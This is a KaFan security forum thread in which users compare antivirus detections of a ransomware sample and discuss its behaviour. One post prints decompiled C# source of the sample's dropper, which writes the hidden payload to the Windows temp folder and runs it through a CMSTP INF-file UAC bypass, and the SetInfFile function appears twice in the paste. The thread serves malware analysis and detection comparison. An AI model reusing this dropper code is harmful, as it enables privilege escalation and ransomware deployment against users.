查看: 904|回复: 9
收起左侧

[病毒样本] #Ransom

[复制链接]
hsks
发表于 2021-2-8 16:28:13 | 显示全部楼层 |阅读模式
https://www.virustotal.com/gui/f ... a37d4edf9/detection

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
k2132
发表于 2021-2-8 16:30:31 | 显示全部楼层
智量 火绒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qwerwer
头像被屏蔽
发表于 2021-2-8 16:32:53 | 显示全部楼层
卡巴阻止下载
正在缓冲
头像被屏蔽
发表于 2021-2-8 16:34:35 | 显示全部楼层
本帖最后由 正在缓冲 于 2021-2-8 16:35 编辑

avast、ESET、Microsoft Defender:Ransom:MSIL/FileCoder!MTB

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
泉州晋江
头像被屏蔽
发表于 2021-2-8 16:34:43 | 显示全部楼层
AVG

Win32:RansomX-gen [Ransom]
BitterLotus
发表于 2021-2-8 16:36:35 | 显示全部楼层
本帖最后由 BitterLotus 于 2021-2-8 17:07 编辑

似乎只是勒索病毒释放器而已,没有主体,主体是在Windows\temp下的随机文件名.exe
这里是反编译出来的Main函数源码,GetResource就是获取并返回主体程序的源码
  1. public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";
  2. public static extern bool SetForegroundWindow(IntPtr hWnd);
  3. [DllImport("user32.dll")]
  4. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);



  5. public static void Main()
  6. {
  7.         try
  8.         {
  9.                 string text = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp\" + Path.GetRandomFileName().Split(new char[]
  10.                 {
  11.                         Convert.ToChar(".")
  12.                 })[0] + ".exe";
  13.                 File.WriteAllBytes(text, CMSTPBypass.GetResource("3rt5bhzrahq"));
  14.                 StringBuilder stringBuilder = new StringBuilder();
  15.                 stringBuilder.Append(CMSTPBypass.SetInfFile("cmd /c start "" + text + """));
  16.                 Process.Start(new ProcessStartInfo(CMSTPBypass.BinaryPath)
  17.                 {
  18.                         Arguments = "/au " + stringBuilder.ToString(),
  19.                         UseShellExecute = false,
  20.                         CreateNoWindow = true,
  21.                         WindowStyle = ProcessWindowStyle.Hidden
  22.                 });
  23.                 IntPtr value = 0;
  24.                 value = IntPtr.Zero;
  25.                 do
  26.                 {
  27.                         value = CMSTPBypass.SetWindowActive("cmstp");
  28.                 }
  29.                 while (value == IntPtr.Zero);
  30.                 SendKeys.SendWait("{ENTER}");
  31.         }
  32.         catch
  33.         {
  34.         }
  35.         Environment.Exit(0);
  36. }
  37. private static byte[] GetResource(string file)
  38. {
  39.         ResourceManager resourceManager = new ResourceManager("d3m0edrn1zd", Assembly.GetExecutingAssembly());
  40.         return (byte[])resourceManager.GetObject(file);
  41. }
  42. public static string SetInfFile(string CommandToExecute)
  43. {
  44.         string value = Path.GetRandomFileName().Split(new char[]
  45.         {
  46.                 Convert.ToChar(".")
  47.         })[0];
  48.         string value2 = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp";
  49.         StringBuilder stringBuilder = new StringBuilder();
  50.         stringBuilder.Append(value2);
  51.         stringBuilder.Append("\");
  52.         stringBuilder.Append(value);
  53.         stringBuilder.Append(".inf");
  54.         StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
  55.         stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
  56.         File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
  57.         return stringBuilder.ToString();
  58. }

  59. public static string SetInfFile(string CommandToExecute)
  60. {
  61.         string value = Path.GetRandomFileName().Split(new char[]
  62.         {
  63.                 Convert.ToChar(".")
  64.         })[0];
  65.         string value2 = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp";
  66.         StringBuilder stringBuilder = new StringBuilder();
  67.         stringBuilder.Append(value2);
  68.         stringBuilder.Append("\");
  69.         stringBuilder.Append(value);
  70.         stringBuilder.Append(".inf");
  71.         StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
  72.         stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
  73.         File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
  74.         return stringBuilder.ToString();
  75. }


  76. public static IntPtr SetWindowActive(string ProcessName)
  77. {
  78.         Process[] processesByName = Process.GetProcessesByName(ProcessName);
  79.         if (processesByName.Length == 0)
  80.         {
  81.                 return IntPtr.Zero;
  82.         }
  83.         processesByName[0].Refresh();
  84.         IntPtr intPtr = 0;
  85.         intPtr = processesByName[0].MainWindowHandle;
  86.         if (intPtr == IntPtr.Zero)
  87.         {
  88.                 return IntPtr.Zero;
  89.         }
  90.         CMSTPBypass.SetForegroundWindow(intPtr);
  91.         CMSTPBypass.ShowWindow(intPtr, 5);
  92.         return intPtr;
  93. }


复制代码

温馨小屋
头像被屏蔽
发表于 2021-2-8 16:41:30 | 显示全部楼层
Norton



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
petr0vic
发表于 2021-2-8 16:48:42 | 显示全部楼层
~56 engines detected this file / VT
megakotaro
发表于 2021-2-8 17:32:26 | 显示全部楼层
点击后马上加密,并删除阴影储存,但运行时没有看到留下勒索信

hybrid-analysis.com
Kaspersky Threat Intelligence Portal
ANY.RUN
心醉咖啡
发表于 2021-2-8 18:50:15 | 显示全部楼层
毒霸
  1. 下载时间: 2021-02-08 18:49:59
  2. 下载工具:  其他
  3. 文件路径:  e:\浏览器下载\x.zip
  4. 病毒名:  Win32.Troj.Undef.(kcloud)
  5. 操作结果:  已删除
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-5 08:52 , Processed in 0.129159 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表